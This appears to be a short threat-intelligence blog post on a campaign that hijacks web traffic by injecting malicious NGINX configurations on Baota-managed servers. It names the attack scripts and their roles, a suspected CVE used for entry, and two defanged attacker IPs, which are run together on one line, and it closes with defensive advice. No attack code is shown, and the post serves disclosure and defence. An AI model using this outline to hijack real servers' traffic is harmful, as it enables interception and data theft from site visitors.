NGINX Hijacking Campaign Targeting Asian TLDs: Threat, Tactics, and Implications
Source: Dev.to
Navigating the Web Traffic Hijacking Campaign Targeting NGINX
In the ever‑evolving landscape of web security, a new campaign has emerged targeting NGINX installations, especially those managed via Baota (BT). The operation leverages malicious shell scripts to inject rogue configurations into NGINX, capturing and redirecting incoming requests through servers under the attacker’s control. This represents a sophisticated web‑traffic hijacking effort with potential implications for Asian TLDs and beyond.
The Heart of the Attack
The campaign uses shell scripts to modify NGINX configuration files. The injected directives are crafted to:
- Capture inbound HTTP requests.
- Redirect traffic to attacker‑controlled servers.
- Facilitate data exfiltration or further malicious activities.
Where It Hits
The attackers focus on:
- Asian top‑level domains such as .in, .id, .pe, and .bd.
- Chinese hosting infrastructure.
- Government and educational domains (.gov, .edu).
These targets increase the potential impact due to the sensitivity of the affected sites.
The Tools at Their Disposal
Several custom scripts automate the intrusion process:
# zx.sh
# Orchestrates the execution of subsequent stages in the attack.
# bt.sh
# Targets Baota Management Panels and overwrites NGINX configurations with malicious rules.
# 4zdh.sh & zdh.sh
# Enumerate common NGINX locations and minimize errors when creating new configuration files.
# ok.sh
# Generates reports on active hijacking rules to assess the campaign’s reach.A Mystery Awaits
The identity of the threat actors remains unknown. However, the campaign appears to exploit vulnerabilities such as CVE‑2025‑55182, which may provide the initial foothold on compromised systems.
The GreyNoise Revelation
GreyNoise data highlights two IP addresses frequently associated with React2Shell exploitation attempts:
193.142.147[.]20987.121.84[.]24
These hosts are considered hotspots for the hijacking activity.
Conclusion: A Call to Action
This campaign underscores the critical need for continuous vigilance in web security:
- Patch known vulnerabilities promptly (e.g., CVE‑2025‑55182).
- Monitor NGINX configurations for unauthorized changes.
- Implement network‑level defenses to detect and block suspicious traffic.
Staying informed about emerging tactics and maintaining robust security hygiene are essential steps toward safeguarding digital infrastructure worldwide.